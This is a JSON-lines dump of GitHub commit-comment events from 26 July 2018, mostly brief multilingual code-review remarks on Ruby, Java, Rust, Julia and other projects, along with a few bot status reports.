{"id":"8022487489","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29843327,"position":15,"line":66,"path":"src/help_functions.c","commit_id":"d607a9a7ef04dd79cc325899fbd7fdf07ec22a47","created_at":"2018-07-26T12:48:21Z","updated_at":"2018-07-26T12:48:21Z","author_association":"MEMBER","body":"or this should not be printed. The idea of parsing for the other messages is just to print them."}},"created_at":"2018-07-26T12:48:21Z"}
{"id":"8022489890","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29843332,"position":13,"line":13,"path":"3/railway_manager.rb","commit_id":"c16dfd851dc9418b22648c28bf45e6307e8c0a37","created_at":"2018-07-26T12:48:49Z","updated_at":"2018-07-26T12:48:49Z","author_association":"NONE","body":"Здесь логичней будет занести в массив сам поезд (в котором будут все его данные), а не просто его тип.\r\nИ еще момент, в классах моделей лучше не использовать puts, так как вывод информации это задача вызывающего кода, а не класса модели (либо возврат данных/true, либо nil, что и будет интерпретироваться в вызывающем коде соответствующим образом)."}},"created_at":"2018-07-26T12:48:49Z"}
{"id":"8022492335","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29843340,"position":17,"line":17,"path":"3/railway_manager.rb","commit_id":"c16dfd851dc9418b22648c28bf45e6307e8c0a37","created_at":"2018-07-26T12:49:16Z","updated_at":"2018-07-26T12:49:16Z","author_association":"NONE","body":"Также и здесь (и везде по коду), верни просто цифру, а потом в интерфейсе подставишь его в строку"}},"created_at":"2018-07-26T12:49:16Z"}
{"id":"8022495601","type":"CommitCommentEvent","actor":{"login":"poulhenry"},"repo":{"name":"poulhenry/Estoque2000"},"payload":{"comment":{"id":29843348,"position":null,"line":null,"path":null,"commit_id":"6b6f04ef3b9a5577c9f406541ca84b768ab87afb","created_at":"2018-07-26T12:49:54Z","updated_at":"2018-07-26T12:49:54Z","author_association":"OWNER","body":"Melhorar esse commit ai"}},"created_at":"2018-07-26T12:49:54Z"}
{"id":"8022496374","type":"CommitCommentEvent","actor":{"login":"mykolaDronShoko"},"repo":{"name":"mykolaDronShoko/MyProject"},"payload":{"comment":{"id":29843351,"position":null,"line":null,"path":null,"commit_id":"388f98ad0d7057ab96a09c1a63f3fb094af46b59","created_at":"2018-07-26T12:50:03Z","updated_at":"2018-07-26T12:50:03Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-26T12:50:03Z"}
{"id":"8022496909","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29843354,"position":34,"line":34,"path":"3/railway_manager.rb","commit_id":"c16dfd851dc9418b22648c28bf45e6307e8c0a37","created_at":"2018-07-26T12:50:10Z","updated_at":"2018-07-26T12:50:10Z","author_association":"NONE","body":"В этот метод передаешь объект и если он есть удаляешь, иначе возвращай nil"}},"created_at":"2018-07-26T12:50:10Z"}
{"id":"8022500189","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29843357,"position":61,"line":61,"path":"3/railway_manager.rb","commit_id":"c16dfd851dc9418b22648c28bf45e6307e8c0a37","created_at":"2018-07-26T12:50:46Z","updated_at":"2018-07-26T12:50:46Z","author_association":"NONE","body":"И тут верни просто массив станций, а в интерфейсе обработаешь циклом (и выведешь)"}},"created_at":"2018-07-26T12:50:46Z"}
{"id":"8022500601","type":"CommitCommentEvent","actor":{"login":"xuedong"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29843358,"position":78,"line":34,"path":"src/fixed_confidence/track_stop.jl","commit_id":"78b5441066e637bc6524cd4d17f5af011bad140c","created_at":"2018-07-26T12:50:51Z","updated_at":"2018-07-26T12:50:51Z","author_association":"OWNER","body":"no, it's independent. this threshold is here only to make sure that the algorithm doesn't block for too long."}},"created_at":"2018-07-26T12:50:51Z"}
{"id":"8022501265","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"codefresh-io/cli"},"payload":{"comment":{"id":29843360,"position":null,"line":null,"path":null,"commit_id":"02226594a529b770392183af0198321b723ca996","created_at":"2018-07-26T12:50:58Z","updated_at":"2018-07-26T12:50:58Z","author_association":"NONE","body":"\n:crown: Good job! this pull request is aligned with your organization's best practices!\n:shipit: We've got some intel on your code - 3 events were tracked in this pull request\n\n:point_right: <a href='https://github.com/codefresh-io/cli/pull/213/checks?check_run_id=9364941'>click here</a> to view a full list of the events :point_left:\n"}},"created_at":"2018-07-26T12:50:58Z"}
{"id":"8022506250","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29843372,"position":68,"line":68,"path":"3/railway_manager.rb","commit_id":"c16dfd851dc9418b22648c28bf45e6307e8c0a37","created_at":"2018-07-26T12:51:54Z","updated_at":"2018-07-26T12:51:54Z","author_association":"NONE","body":"Зачем класс Train если все данные ты хранишь в хэше? Для того и нужен класс, что в его атрибутах (переменных) хранить значения."}},"created_at":"2018-07-26T12:51:54Z"}
{"id":"8022510738","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"carboninc/ThinkRuby"},"payload":{"comment":{"id":29843408,"position":88,"line":88,"path":"3/railway_manager.rb","commit_id":"c16dfd851dc9418b22648c28bf45e6307e8c0a37","created_at":"2018-07-26T12:52:44Z","updated_at":"2018-07-26T12:52:44Z","author_association":"NONE","body":"Не нарушай принцип единственной ответственности (если кратко, то - каждый метод делает что-то одно). Нужно разделить"}},"created_at":"2018-07-26T12:52:44Z"}
{"id":"8022513440","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"gtk-rs/examples"},"payload":{"comment":{"id":29843417,"position":33,"line":29,"path":"src/bin/grid.rs","commit_id":"3894cf6fa7119574bfc2422419443f45b92d2ef2","created_at":"2018-07-26T12:53:13Z","updated_at":"2018-07-26T12:53:13Z","author_association":"MEMBER","body":"This needs a call to `upgrade()`"}},"created_at":"2018-07-26T12:53:13Z"}
{"id":"8022516772","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"gtk-rs/examples"},"payload":{"comment":{"id":29843423,"position":null,"line":null,"path":null,"commit_id":"3894cf6fa7119574bfc2422419443f45b92d2ef2","created_at":"2018-07-26T12:53:50Z","updated_at":"2018-07-26T12:53:50Z","author_association":"MEMBER","body":"Looks good except for the missing `upgrade()` call. Not sure how this compiled? `downgrade()` does not return an `Option`"}},"created_at":"2018-07-26T12:53:50Z"}
{"id":"8022518220","type":"CommitCommentEvent","actor":{"login":"shuusan"},"repo":{"name":"shuusan/Make-a-household-account-book"},"payload":{"comment":{"id":29843426,"position":null,"line":null,"path":null,"commit_id":"04868509978a59e37c47dd4d0351f714f32a8b18","created_at":"2018-07-26T12:54:07Z","updated_at":"2018-07-26T12:54:07Z","author_association":"OWNER","body":"およびその他変更点"}},"created_at":"2018-07-26T12:54:07Z"}
{"id":"8022523619","type":"CommitCommentEvent","actor":{"login":"VARALAKSHMI-RAVI"},"repo":{"name":"VARALAKSHMI-RAVI/intro-html"},"payload":{"comment":{"id":29843443,"position":null,"line":null,"path":null,"commit_id":"816516d300e5c56cf1249650a961b306d83e7ce7","created_at":"2018-07-26T12:55:07Z","updated_at":"2018-07-26T12:55:07Z","author_association":"OWNER","body":"<html>\r\n<body>\r\nHello World!\r\n</body>\r\n</html>"}},"created_at":"2018-07-26T12:55:07Z"}
{"id":"8022527029","type":"CommitCommentEvent","actor":{"login":"epicmonkey"},"repo":{"name":"monicahq/monica"},"payload":{"comment":{"id":29843445,"position":38,"line":38,"path":"database/migrations/2018_07_08_104306_update-timestamps-timezone.php","commit_id":"f5888accd595c4b628e86f0f46195d02727e6797","created_at":"2018-07-26T12:55:42Z","updated_at":"2018-07-26T12:55:42Z","author_association":"NONE","body":"No problem! Just to make sure you are on top of it, there is the same typo\nin line 68, a block with “jobs” table.\n\n-- \nepicmonkey\n\nOn 26 July 2018 at 04:33:28, Alexis Saettler (notifications@github.com)\nwrote:\n\n> Oh damn, you're right @epicmonkey <https://github.com/epicmonkey>\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/monicahq/monica/commit/f5888accd595c4b628e86f0f46195d02727e6797#commitcomment-29840354>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAHLsyFJeOZIzv-Xj-qInn2jc1aOlStUks5uKX7XgaJpZM4VhJV6>\n> .\n>\n"}},"created_at":"2018-07-26T12:55:42Z"}
{"id":"8022527378","type":"CommitCommentEvent","actor":{"login":"minipanda30"},"repo":{"name":"minipanda30/minipanda30.github.io"},"payload":{"comment":{"id":29843448,"position":null,"line":null,"path":null,"commit_id":"452935ee36a0b23614c7cfb58d330afeb061a81f","created_at":"2018-07-26T12:55:46Z","updated_at":"2018-07-26T12:55:46Z","author_association":"OWNER","body":"deleted"}},"created_at":"2018-07-26T12:55:46Z"}
{"id":"8022528585","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"dogiex/MIUI-XML-10-FINNISH"},"payload":{"comment":{"id":29843453,"position":null,"line":null,"path":null,"commit_id":"3bb5866b8e13584dd432fda50d44e366296e6aa0","created_at":"2018-07-26T12:56:00Z","updated_at":"2018-07-26T12:56:00Z","author_association":"COLLABORATOR","body":"Fix issues \r\nhttps://translators.xiaomi.eu/XML_MIUI10-Finnish-fi.html"}},"created_at":"2018-07-26T12:56:00Z"}
{"id":"8022530528","type":"CommitCommentEvent","actor":{"login":"djcooke"},"repo":{"name":"TGAC/miso-lims"},"payload":{"comment":{"id":29843459,"position":42,"line":94,"path":"miso-web/src/main/java/uk/ac/bbsrc/tgac/miso/webapp/controller/AttachmentController.java","commit_id":"042a58129f0dbc7bfdeb5fd2a812957dcb49a790","created_at":"2018-07-26T12:56:22Z","updated_at":"2018-07-26T12:56:22Z","author_association":"COLLABORATOR","body":"Eclipse trying to be magical..."}},"created_at":"2018-07-26T12:56:22Z"}
{"id":"8022530951","type":"CommitCommentEvent","actor":{"login":"jpfr"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":29843461,"position":null,"line":null,"path":null,"commit_id":"560f685ff9250f413cd76e98cd3b5791ed374f51","created_at":"2018-07-26T12:56:27Z","updated_at":"2018-07-26T12:56:27Z","author_association":"CONTRIBUTOR","body":"This was already fixed in https://github.com/open62541/open62541/commit/e447dc5b6e3c2a416387ef7be8ae6a6297b2e86d."}},"created_at":"2018-07-26T12:56:27Z"}
{"id":"8022531380","type":"CommitCommentEvent","actor":{"login":"NSAttila"},"repo":{"name":"NSAttila/lecture0"},"payload":{"comment":{"id":29843462,"position":null,"line":null,"path":null,"commit_id":"0a80f707ad4fd60e21063dd56a48bdc27981b8c8","created_at":"2018-07-26T12:56:31Z","updated_at":"2018-07-26T12:56:31Z","author_association":"OWNER","body":"it s ok"}},"created_at":"2018-07-26T12:56:31Z"}
{"id":"8022537317","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29843484,"position":32,"line":3584,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/doc/XWikiDocument.java","commit_id":"e8208d08dd4d9be5143002d33ca8431f7decf90f","created_at":"2018-07-26T12:57:35Z","updated_at":"2018-07-26T12:57:35Z","author_association":"MEMBER","body":"> I'm curious if the copy of the ID should respect the value of keepsIdentity. Normally, it should, and should only be copied if keepsIdentity is true.\r\n\r\nThis keepsIdentity parameter does not make much sense in the first place actually, the criteria should be based on the passed document reference (being the same or not as the current one). But yes it should certainly not be copied all the time, I think it's just a quick copy/paste from the other clone method.\r\n\r\n> On the other hand, I fail to see the utility of manipulating the id internal field (copying it, even setting it with setId()) when the getter always reinitializes it based on the document reference.\r\n\r\nRecalculating it all the time actually does not make much sense from performance point of view. But it should be used as an internal cache and setId should be deprecated since it does not make any sense to change the id from outside of XWikiDocument."}},"created_at":"2018-07-26T12:57:35Z"}
{"id":"8022541775","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29843497,"position":10,"line":10,"path":"Lesson_2/amount_of_purchases.rb","commit_id":"5aa436bb6d2e02fc3ff59b2d932b2c9f0d59e54b","created_at":"2018-07-26T12:58:25Z","updated_at":"2018-07-26T12:58:25Z","author_association":"NONE","body":"в руби не рекомендуют использовать `if / end` блоки без `else` ветви, если код умещается на одной строке\r\nдля такого случая предпочтение отдается \"постфиксной\" форме `if`\r\nдругими словами вместо\r\n```ruby {.line-numbers}\r\n    if a > b\r\n      do_something\r\n    end\r\n```\r\nрекомендуется писать\r\n```ruby {.line-numbers}\r\n    do_something if a > b\r\n```\r\n\r\nможно и нужно использовать префиксный if (до тела), если:\r\n- код, выполняемый по условию сложный (в несколько строк)\r\n- код занимает одну строку, но она длинаая\r\n"}},"created_at":"2018-07-26T12:58:25Z"}
{"id":"8022544178","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29843502,"position":null,"line":null,"path":null,"commit_id":"7577b003fad4bea74f0fbc0acfb888703c214323","created_at":"2018-07-26T12:58:52Z","updated_at":"2018-07-26T12:58:52Z","author_association":"NONE","body":"congrats!"}},"created_at":"2018-07-26T12:58:52Z"}
{"id":"8022544787","type":"CommitCommentEvent","actor":{"login":"mblacanin"},"repo":{"name":"MichaelAquilina/Document-Classification"},"payload":{"comment":{"id":29843504,"position":null,"line":null,"path":null,"commit_id":"7ddc93f2d9672fcee1e3530ecf38f38392f467f3","created_at":"2018-07-26T12:58:59Z","updated_at":"2018-07-26T12:58:59Z","author_association":"NONE","body":"Is there any test file to try this program?"}},"created_at":"2018-07-26T12:58:59Z"}
{"id":"8022553918","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29843525,"position":null,"line":null,"path":null,"commit_id":"7577b003fad4bea74f0fbc0acfb888703c214323","created_at":"2018-07-26T13:00:36Z","updated_at":"2018-07-26T13:00:36Z","author_association":"NONE","body":"It finally passed. Congrats!"}},"created_at":"2018-07-26T13:00:36Z"}
{"id":"8022569743","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29843553,"position":78,"line":34,"path":"src/fixed_confidence/track_stop.jl","commit_id":"78b5441066e637bc6524cd4d17f5af011bad140c","created_at":"2018-07-26T13:03:29Z","updated_at":"2018-07-26T13:03:29Z","author_association":"NONE","body":"OK, so it's a \"hack\" but it makes sense :+1: !"}},"created_at":"2018-07-26T13:03:29Z"}
{"id":"8022569865","type":"CommitCommentEvent","actor":{"login":"jhseo1107"},"repo":{"name":"OlliStudio/S-DOHyUNG-Java"},"payload":{"comment":{"id":29843554,"position":null,"line":null,"path":null,"commit_id":"07ab30bc8e9b50b4fb89f40a65d1246c45b8fae8","created_at":"2018-07-26T13:03:31Z","updated_at":"2018-07-26T13:03:31Z","author_association":"MEMBER","body":"Backup"}},"created_at":"2018-07-26T13:03:31Z"}
{"id":"8022572478","type":"CommitCommentEvent","actor":{"login":"rencoo"},"repo":{"name":"rencoo/testnpm"},"payload":{"comment":{"id":29843556,"position":null,"line":null,"path":null,"commit_id":"3c9deabf5b19f7de9471585a57a99bf603ff8334","created_at":"2018-07-26T13:04:01Z","updated_at":"2018-07-26T13:04:01Z","author_association":"OWNER","body":"Initial commit"}},"created_at":"2018-07-26T13:04:01Z"}
{"id":"8022572809","type":"CommitCommentEvent","actor":{"login":"PriyankaNanjappa"},"repo":{"name":"i40-Tools/StandardOntology"},"payload":{"comment":{"id":29843559,"position":null,"line":null,"path":null,"commit_id":"2efd28fce70e6c32918251510b249d8ea20e53c5","created_at":"2018-07-26T13:04:04Z","updated_at":"2018-07-26T13:04:04Z","author_association":"COLLABORATOR","body":"Clear Syntax errors in Publication Date values  "}},"created_at":"2018-07-26T13:04:04Z"}
{"id":"8022578411","type":"CommitCommentEvent","actor":{"login":"Rideress"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29843572,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-26T13:05:03Z","updated_at":"2018-07-26T13:05:03Z","author_association":"OWNER","body":"Экземпляр класса мы создаем при помощи такого кода?\r\n`MyOutput myOut = new MyOutput();`"}},"created_at":"2018-07-26T13:05:03Z"}
{"id":"8022583073","type":"CommitCommentEvent","actor":{"login":"DennySPB"},"repo":{"name":"BenzoRom/build_soong"},"payload":{"comment":{"id":29843585,"position":null,"line":null,"path":null,"commit_id":"90bda53c523cf6f4c6a38d7733bcae0362644eca","created_at":"2018-07-26T13:05:52Z","updated_at":"2018-07-26T13:05:52Z","author_association":"NONE","body":"This broke some apps (unwind error), such as Instagram, Facebook, Yandex maps etc.. :(\r\nI disable LTO for now as workaround"}},"created_at":"2018-07-26T13:05:52Z"}
{"id":"8022586828","type":"CommitCommentEvent","actor":{"login":"MaxBazarov"},"repo":{"name":"MaxBazarov/exporter"},"payload":{"comment":{"id":29843599,"position":null,"line":null,"path":null,"commit_id":"9851093614f4d4eac955f0a2abff3fa1aca79c5d","created_at":"2018-07-26T13:06:34Z","updated_at":"2018-07-26T13:06:34Z","author_association":"OWNER","body":"Thanks!Btw, you can send emails directly to exporter.plugin@yandex.comAnd subscribe to our Twitter account @exporter.plugin to be informed about new versions and hints.On 26 Jul 2018, at 14:50, cpshanley <notifications@github.com> wrote:Hey Max. You are on my Christmas card list. Works a treat. I shall be using it in anger in a week or so for a client, so I'll let you know how I do.The challenge for you, as I see it, it enabling things that Sketch doesn't. Things like overlays or hover effects.I guess transitions could be included, but you'd need to capture that for every link.Your kung fu is strong. CIn cin.—You are receiving this because you commented.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-26T13:06:34Z"}
{"id":"8022594785","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-latinLit"},"payload":{"comment":{"id":29843610,"position":null,"line":null,"path":null,"commit_id":"f35114efc873f374ec0ce5dc80e4347f92a8b091","created_at":"2018-07-26T13:08:00Z","updated_at":"2018-07-26T13:08:00Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.14 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |     2    |\n| `nodes_count`      |   656    |\n| `texts_passing`    |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `lat`     |    +4537 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi0969/__cts__.xml`                            | New      |\n| `./data/phi0969/phi001/__cts__.xml`                     | New      |\n| `./data/phi0969/__cts__.xml`                            | Passing  |\n| `./data/phi0969/phi001/__cts__.xml`                     | Passing  |\n| `./data/phi0969/phi001/phi0969.phi001.perseus-lat1.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-latinLit/4491)*\n"}},"created_at":"2018-07-26T13:08:00Z"}
{"id":"8022597945","type":"CommitCommentEvent","actor":{"login":"Naereen"},"repo":{"name":"xuedong/BestArm.jl"},"payload":{"comment":{"id":29843619,"position":16,"line":38,"path":"src/BestArm.jl","commit_id":"3fb2930d245ac2963b7f37cec3e9234764f88f24","created_at":"2018-07-26T13:08:31Z","updated_at":"2018-07-26T13:08:31Z","author_association":"NONE","body":"Nobody does :rofl: "}},"created_at":"2018-07-26T13:08:31Z"}
{"id":"8022598212","type":"CommitCommentEvent","actor":{"login":"theLeroy"},"repo":{"name":"theLeroy/Pacman-NN"},"payload":{"comment":{"id":29843620,"position":172,"line":172,"path":"Files/sketch.js","commit_id":"80e8ec9febba2ad31c12d60973a5e2a8e7c08293","created_at":"2018-07-26T13:08:34Z","updated_at":"2018-07-26T13:08:34Z","author_association":"OWNER","body":"Wtf\r\n"}},"created_at":"2018-07-26T13:08:34Z"}
{"id":"8022598755","type":"CommitCommentEvent","actor":{"login":"AlexeyTuhtiaev"},"repo":{"name":"YanaTux/Labs"},"payload":{"comment":{"id":29843622,"position":16,"line":16,"path":"LB1/LB1_1/Array.cs","commit_id":"52670d2d280399c10ccea0bdaa246d150583b65c","created_at":"2018-07-26T13:08:40Z","updated_at":"2018-07-26T13:08:40Z","author_association":"NONE","body":"A variable should started with lowercase."}},"created_at":"2018-07-26T13:08:40Z"}
{"id":"8022601903","type":"CommitCommentEvent","actor":{"login":"AlexeyTuhtiaev"},"repo":{"name":"YanaTux/Labs"},"payload":{"comment":{"id":29843632,"position":70,"line":70,"path":"LB1/LB1_1/Array.cs","commit_id":"52670d2d280399c10ccea0bdaa246d150583b65c","created_at":"2018-07-26T13:09:12Z","updated_at":"2018-07-26T13:09:12Z","author_association":"NONE","body":"A variable should started with lowercase."}},"created_at":"2018-07-26T13:09:12Z"}
{"id":"8022605758","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29843642,"position":null,"line":null,"path":null,"commit_id":"45e3fc39edf9b13f17fcf497dd3b10556b22b6de","created_at":"2018-07-26T13:09:54Z","updated_at":"2018-07-26T13:09:54Z","author_association":"OWNER","body":"Good"}},"created_at":"2018-07-26T13:09:54Z"}
{"id":"8022605997","type":"CommitCommentEvent","actor":{"login":"AlexeyTuhtiaev"},"repo":{"name":"YanaTux/Labs"},"payload":{"comment":{"id":29843644,"position":9,"line":9,"path":"LB1/LB1_1/Array.cs","commit_id":"52670d2d280399c10ccea0bdaa246d150583b65c","created_at":"2018-07-26T13:09:58Z","updated_at":"2018-07-26T13:09:58Z","author_association":"NONE","body":"Any comments in this file?)"}},"created_at":"2018-07-26T13:09:58Z"}
{"id":"8022607159","type":"CommitCommentEvent","actor":{"login":"Lion-Li"},"repo":{"name":"Lion-Li/DailyFresh"},"payload":{"comment":{"id":29843647,"position":null,"line":null,"path":null,"commit_id":"024a4bc38c21d3dfde505fc7a5d78b0d7877712c","created_at":"2018-07-26T13:10:10Z","updated_at":"2018-07-26T13:10:10Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-26T13:10:10Z"}
{"id":"8022612643","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29843664,"position":6,"line":6,"path":"Lesson_2/amount_of_purchases.rb","commit_id":"5aa436bb6d2e02fc3ff59b2d932b2c9f0d59e54b","created_at":"2018-07-26T13:11:02Z","updated_at":"2018-07-26T13:11:02Z","author_association":"NONE","body":"давай разберемся нужен ли здесь `chomp!` c восклицательным знаком )\r\n\r\nпусть у нас к примеру есть методы `some_method` и `some_method!`\r\n\r\nметод `some_method!` - это \"бенг-метод\"\r\n\r\nв большинстве случаев отличие \"бенг-методов\" от \"обычных\" в том, что они мутируют, т.е. изменяют переменную\r\nесли написать\r\n```ruby\r\nvariable.some_method\r\n```\r\nто значение в переменной не изменится\r\nдля изменения значения и его сохранения нужно написать либо\r\n```ruby\r\nvariable = variable.some_method\r\n```\r\nлибо\r\n```ruby\r\nvariable.some_method!\r\n```\r\nв любом из двух последних случаев в переменной `variable` сохранится уже новое значение, подвергшееся воздействию метода `some_method`\r\n\r\nв текущем коде идет присвоение значения, полученного из терминала в переменную\r\nречь об изменении уже сохраненного значения не идет\r\n\r\nпоэтому достаточно \"обычного\" метода, восклицательный знак лучше убрать (как правило \"бенг-методы\" более ресурсозатратны, чем их \"обычные\" родственники)"}},"created_at":"2018-07-26T13:11:02Z"}
{"id":"8022612811","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29843665,"position":null,"line":null,"path":null,"commit_id":"8d7f8f70bd8d399636100be99317c694e837f626","created_at":"2018-07-26T13:11:04Z","updated_at":"2018-07-26T13:11:04Z","author_association":"OWNER","body":"@cnuke: please add to your dde_linux branch"}},"created_at":"2018-07-26T13:11:04Z"}
{"id":"8022614308","type":"CommitCommentEvent","actor":{"login":"hiattp"},"repo":{"name":"lockstep/rails_new"},"payload":{"comment":{"id":29843667,"position":null,"line":null,"path":null,"commit_id":"1fa918ff1a418f6dab72a87f21d5a03ae28150f5","created_at":"2018-07-26T13:11:19Z","updated_at":"2018-07-26T13:11:19Z","author_association":"CONTRIBUTOR","body":"Seems like we should add `RACK_TIMEOUT_SERVICE_TIMEOUT` to the readme so people know to set it. Does it have a default?"}},"created_at":"2018-07-26T13:11:19Z"}
{"id":"8022618222","type":"CommitCommentEvent","actor":{"login":"derNiklaas"},"repo":{"name":"codeoverflow-org/chatoverflow"},"payload":{"comment":{"id":29843672,"position":53,"line":57,"path":"src/main/scala/org/codeoverflow/chatoverflow/ChatOverflow.scala","commit_id":"ba81028688ad9f98f58df1d70ff5052080868f8f","created_at":"2018-07-26T13:11:59Z","updated_at":"2018-07-26T13:11:59Z","author_association":"NONE","body":"Maybe you should add \"Phase 6:\" to the output in order to ensure consistency\r\n\r\n"}},"created_at":"2018-07-26T13:11:59Z"}
{"id":"8022623294","type":"CommitCommentEvent","actor":{"login":"talhasch"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29843680,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T13:12:52Z","updated_at":"2018-07-26T13:12:52Z","author_association":"CONTRIBUTOR","body":"@good-karma replaced ¶ (&para;) with empty (&nbsp;) i think this way looking better."}},"created_at":"2018-07-26T13:12:52Z"}
{"id":"8022624216","type":"CommitCommentEvent","actor":{"login":"alastint"},"repo":{"name":"alastint/progress-board-ui"},"payload":{"comment":{"id":29843683,"position":75,"line":74,"path":"src/app/pages/homepage/homepage.component.ts","commit_id":"2e34eb8643a04481432a4f8d64f85ab066d0f93e","created_at":"2018-07-26T13:13:02Z","updated_at":"2018-07-26T13:13:02Z","author_association":"OWNER","body":"appUser.id === messageString ? this.authorId = 2 : this.authorId = 1; SHOULD BE:   this.authorId = appUser.id === messageString ? 2 : 1;"}},"created_at":"2018-07-26T13:13:02Z"}
{"id":"8022625884","type":"CommitCommentEvent","actor":{"login":"janklimo"},"repo":{"name":"lockstep/rails_new"},"payload":{"comment":{"id":29843688,"position":null,"line":null,"path":null,"commit_id":"1fa918ff1a418f6dab72a87f21d5a03ae28150f5","created_at":"2018-07-26T13:13:20Z","updated_at":"2018-07-26T13:13:20Z","author_association":"MEMBER","body":"It’s 15 seconds by default"}},"created_at":"2018-07-26T13:13:20Z"}
{"id":"8022627359","type":"CommitCommentEvent","actor":{"login":"LinusU"},"repo":{"name":"diamondio/better-queue"},"payload":{"comment":{"id":29843692,"position":null,"line":null,"path":null,"commit_id":"9a06da924aac9c0f550765f3a9c80fede3813949","created_at":"2018-07-26T13:13:36Z","updated_at":"2018-07-26T13:13:36Z","author_association":"COLLABORATOR","body":"Did you mean to commit `index.js`? Maybe that should be moved to `test/`?"}},"created_at":"2018-07-26T13:13:36Z"}
{"id":"8022628372","type":"CommitCommentEvent","actor":{"login":"me4502"},"repo":{"name":"cindyker/CommandBook"},"payload":{"comment":{"id":29843698,"position":67,"line":80,"path":"src/main/java/com/sk89q/commandbook/util/item/ItemUtil.java","commit_id":"6f2ba1a4591b424b5e4a25cf3f0bbfbd9bf214d6","created_at":"2018-07-26T13:13:46Z","updated_at":"2018-07-26T13:13:46Z","author_association":"NONE","body":"Please use WorldEdit's ItemParser"}},"created_at":"2018-07-26T13:13:46Z"}
{"id":"8022632485","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29843709,"position":12,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"e4ccc36ef4e7f4a4c065e27072189641f9ac2e0c","created_at":"2018-07-26T13:14:32Z","updated_at":"2018-07-26T13:14:32Z","author_association":"NONE","body":"Да. Если быть точнее, мы здесь выполняем сразу три действия:\r\n- Объявляем переменную ```myOut``` типа ```MyOutput```\r\n- Создаём экземпляр класса ```MyOutput``` (выделяем память с помощью ```new``` и инициализируем объект с помощью вызова конструктора ````MyOutput()``` - эти две операции следуют неразрывно, но мажно понимать, что их тут именно две)\r\n- Сохраняем ссылку на объект в переменную\r\n\r\nЭти же три действия могли бы записаны двумя отдельными командами:\r\n```java\r\nMyOutput myOut;\r\nmyOut = new MyOutput();\r\n```\r\n\r\nВажно понимать, что такая запись может быть в теле метода, но не в теле класса. В теле класса не может быть отдельных команд - только в теле методов или в составе инициализатора полей"}},"created_at":"2018-07-26T13:14:32Z"}
{"id":"8022633149","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"vladimirblokhin/course"},"payload":{"comment":{"id":29843710,"position":18,"line":18,"path":"Lesson_2/amount_of_purchases.rb","commit_id":"5aa436bb6d2e02fc3ff59b2d932b2c9f0d59e54b","created_at":"2018-07-26T13:14:39Z","updated_at":"2018-07-26T13:14:39Z","author_association":"NONE","body":"метод `merge` сам по себе не самый экономный метод, его \"бенг-версия\" еще более ресурсозатратна\r\n\r\nздесь проще, оптимальней и наглядней записать так:\r\n```ruby\r\nall_purchases[name] = { price: price, quantity: quantity }\r\n```\r\nрезультат будет тот же"}},"created_at":"2018-07-26T13:14:39Z"}
